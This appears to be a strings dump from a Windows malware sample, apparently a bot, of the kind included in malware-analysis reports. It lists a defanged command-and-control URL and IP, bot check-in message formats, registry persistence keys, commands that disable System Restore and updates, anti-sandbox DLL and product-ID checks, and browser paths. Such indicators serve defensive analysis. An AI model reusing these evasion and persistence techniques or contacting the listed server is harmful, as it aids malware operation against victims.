uR2mlpMYv5W4VaWL9xsPDJQnbNe-RWVOw-eZPGEtf6dOEE5KjD0UeQfjZ3fi8qtGvtpJX3JZznnK7rIp3pidhaSa6f2`WMQlpSSldJf5nq3ICieMdKeqlc-uYmu7ZsiW3xNje09YsXIC0UzXFK1JRJ2Js-lbSCt72YHkB7kn4BhJdop2Y9zj4p93CqlTbT2WUwhjuv3NXc4nY3RweDpr4TcsKhjuLPkmbBedMY0uGavBaXr5mXRcmguEdW2wpN7hSl4zG3hlAfnFQypu5bcu9NTp-Yh`2AOOkz7ESmgINczE8xYbxufC54rtN2soEJ8mnDIVGyaHb2SN6kjo73dCh1dvznECtF0q2O3o4Ol`VhfPTIX9JfOsgoJY`-YNMIXrjpeNj54bwpTa8ztzieNgq17ilaVGQjfRAt6-RHefOjRSSsgNY0eDnmyoVRW3YJMAH7kewelPoyZMOyi9bJl4wIA-Z-sEz40GeoqekIVOU4b`KVujg3EAp6-R7hpalFlpmMhN9FgSgQtYLrTpdfp3ZQ54EsmglgmWHNyR2z5milwrVsWEfzituwQr75q7Ui2vqOHXZrgHH9mBs`sv8z57OUvwgKQIJq`1RCT0LJaQmbwf5m23hHwaL7cMi4c1vRupB9BzWeUfFQaEOPd6li-MDQGB9kCqaq`HP1CNi66hgvU6VM6IkjSozXTfNTvdPo`r`wq0rfKuKo8gb`SbpLluUsqIyCvxXBSQj9nHxJKoNR92UXl0BlO4UZyXDKbyD49fO2oTgXk22ku-KRTkI4FkQ45okEA5JVHbAi-qMDMsG1v9l5mvjBQxr14gbhZFzkHqTLoRZBG9c6Q5IqsoxVUun68-KfL4BVvZXKAThnMcyFno4VPu6TLKVVMdUef3-lXkQRrRirk`IqKVttxx7NYld793l17ASa0QyqhjvtTGofic8iY6W3u012yaOuINdZA9BQlj99icwj0s67y-rikCvm4PmbHKZCdI7kc92q2ftiDYbNHFFJXHNZqNPi6rSJZYKhyCiiJjna00xjA9l`747bWXqfZeVnxB24MdwxlCcIDvNWQFk7wXvME0t-Bej3NgnN0t1ugB19nUApQUQPdaemUviFhpllFjI0s~

libgcj-13.dll

libgcj-13.dll

Mozilla/4.0 (compatible)

Mozilla/4.0 (compatible)

%s--%s

%s--%s

%s\B%i.tmp

%s\B%i.tmp

http.

http.

hXXp://

hXXp://

hXXps://

hXXps://

%y%m%d

%y%m%d

%s:%i

%s:%i

%s\browser%li.html

%s\browser%li.html

%s "%s"

%s "%s"

Software\Microsoft\Windows NT\CurrentVersion\Windows\load

Software\Microsoft\Windows NT\CurrentVersion\Windows\load

%s\%s.exe

%s\%s.exe

Software\Microsoft\WindowsNT\CurrentVersion\SystemRestore

Software\Microsoft\WindowsNT\CurrentVersion\SystemRestore

NoWindowsUpdate

NoWindowsUpdate

%s@%s

%s@%s

%s\I%li.bat

%s\I%li.bat

%s\U%li.bat

%s\U%li.bat

%s\Google\Chrome\Application\chrome.exe

%s\Google\Chrome\Application\chrome.exe

%s\Internet Explorer\iexplore.exe

%s\Internet Explorer\iexplore.exe

%s\Opera\opera.exe

%s\Opera\opera.exe

%s\Mozilla Firefox\firefox.exe

%s\Mozilla Firefox\firefox.exe

%s\Maxthon3\Bin\Maxthon.exe

%s\Maxthon3\Bin\Maxthon.exe

Google Chrome

Google Chrome

Opera

Opera

Firefox

Firefox

chrome.exe

chrome.exe

opera.exe

opera.exe

firefox.exe

firefox.exe

iexplore.exe

iexplore.exe

Maxthon.exe

Maxthon.exe

%s(%s)

%s(%s)

|type:on_exec|uid:%s|priv:%s|arch:x%s|gend:%s|cores:%i|os:%s|ver:%s|net:%s|new:

|type:on_exec|uid:%s|priv:%s|arch:x%s|gend:%s|cores:%i|os:%s|ver:%s|net:%s|new:

|type:repeat|uid:%s|ram:%ld|bk_killed:%i|bk_files:%i|bk_keys:%i|busy:%s|

|type:repeat|uid:%s|ram:%ld|bk_killed:%i|bk_files:%i|bk_keys:%i|busy:%s|

%s%s%i%s%s%s%s%s

%s%s%i%s%s%s%s%s

%s:%s

%s:%s

HTTP/1.1

HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Content-Type: application/x-www-form-urlencoded

|type:response|uid:%s|taskid:%i|return:%s|busy:%s|

|type:response|uid:%s|taskid:%i|return:%s|busy:%s|

autoruns.exe

autoruns.exe

explorer.exe

explorer.exe

SbieDll.dll

SbieDll.dll

snxhk.dll

snxhk.dll

dbghelp.dll

dbghelp.dll

SOFTWARE\Microsoft\Windows NT\CurrentVersion

SOFTWARE\Microsoft\Windows NT\CurrentVersion

76487-640-1457236-23837

76487-640-1457236-23837

76487-644-3177037-23510

76487-644-3177037-23510

55274-640-2673064-23950

55274-640-2673064-23950

76497-640-6308873-23835

76497-640-6308873-23835

Windows Task Manager

Windows Task Manager

%s %i %i

%s %i %i

.hidden

.hidden

filesearch.stop

filesearch.stop

%s@%s:%i

%s@%s:%i

%s\System32\drivers\etc\protocol

%s\System32\drivers\etc\protocol

%s\Microsoft.NET\Framework\

%s\Microsoft.NET\Framework\

v4.0.30319

v4.0.30319

v2.0.50727

v2.0.50727

\explorer.exe

\explorer.exe

HTTP/1.

HTTP/1.

text/html, application/xml;q=0.9, application/xhtml xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1

text/html, application/xml;q=0.9, application/xhtml xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1

application/x-www-form-urlencoded

application/x-www-form-urlencoded

HTTP/1.

HTTP/1.

dnsapi.dll

dnsapi.dll

%s & %s

%s & %s

Software\Microsoft\Windows\CurrentVersion\

Software\Microsoft\Windows\CurrentVersion\

\Microsoft\Windows

\Microsoft\Windows

%s%s%s%s%i%s%s

%s%s%s%s%i%s%s

:Zone.Identifier

:Zone.Identifier

%s\K%li.bat

%s\K%li.bat

document.write(unescape('%s'));

document.write(unescape('%s'));

operator

operator

operator

operator

global constructors keyed to

global constructors keyed to

global destructors keyed to

global destructors keyed to

operator""

operator""

VirtualQuery failed for %d bytes at address %p

VirtualQuery failed for %d bytes at address %p

Unknown pseudo relocation protocol version %d.

Unknown pseudo relocation protocol version %d.

Unknown pseudo relocation bit size %d.

Unknown pseudo relocation bit size %d.

fc_key

fc_key

use_fc_key

use_fc_key

hXXp://23.228.100.130/~vpnmaste/panel/gate.php

hXXp://23.228.100.130/~vpnmaste/panel/gate.php

v1.0.8

v1.0.8

~vpnmaste/panel/gate.php

~vpnmaste/panel/gate.php

23.228.100.130

23.228.100.130

%WinDir%

%WinDir%

%Program Files%

%Program Files%

%Documents and Settings%\All Users

%Documents and Settings%\All Users

%Documents and Settings%\%current user%

%Documents and Settings%\%current user%

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp

%Documents and Settings%\%current user%\Application Data

%Documents and Settings%\%current user%\Application Data

%Documents and Settings%\%current user%\Start Menu\Programs\Startup

%Documents and Settings%\%current user%\Start Menu\Programs\Startup

%Documents and Settings%\All Users\Start Menu\Programs\Startup

%Documents and Settings%\All Users\Start Menu\Programs\Startup

%Program Files%\Internet Explorer\iexplore.exe

%Program Files%\Internet Explorer\iexplore.exe

%Program Files%\Opera\opera.exe

%Program Files%\Opera\opera.exe

%Program Files%\Mozilla Firefox\firefox.exe

%Program Files%\Mozilla Firefox\firefox.exe

%Program Files%\Maxthon3\Bin\Maxthon.exe

%Program Files%\Maxthon3\Bin\Maxthon.exe

e.exe

e.exe

ull)OaJTKCDfzKhXXp://23.228.100.130/~vpnmaste/panel/gate.php80buJEAmbGSSv1.0.8

ull)OaJTKCDfzKhXXp://23.228.100.130/~vpnmaste/panel/gate.php80buJEAmbGSSv1.0.8

306197153

306197153

c:\%original file name%.exe

c:\%original file name%.exe

%WinDir%\306197153

%WinDir%\306197153

%WinDir%\306197153\ADService

%WinDir%\306197153\ADService

NICK

NICK

JOIN

JOIN

PRIVMSG

PRIVMSG

GetProcessHeap

GetProcessHeap

RegCloseKey

RegCloseKey

RegCreateKeyExA

RegCreateKeyExA

RegFlushKey

RegFlushKey

RegOpenKeyExA

RegOpenKeyExA

ShellExecuteA

ShellExecuteA

InternetOpenUrlA

InternetOpenUrlA

.text

.text

P`.data

P`.data

.rdata

.rdata

`@.eh_fram

`@.eh_fram

0@.bss

0@.bss

.idata

.idata

VXa# %D

VXa# %D

&%spie);

&%spie);

.kedD

.kedD

.CRT

.CRT

KERNEL32.DLL

KERNEL32.DLL

ADVAPI32.DLL

ADVAPI32.DLL

msvcrt.dll

msvcrt.dll

SHELL32.DLL

SHELL32.DLL

USER32.dll

USER32.dll

WININET.DLL

WININET.DLL

Okernel32.dll

Okernel32.dll

advapi32.dll

advapi32.dll

Aicmp.dll

Aicmp.dll

surlmon.dll

surlmon.dll

gws2_32.dll

gws2_32.dll

rpcrt4.dll

rpcrt4.dll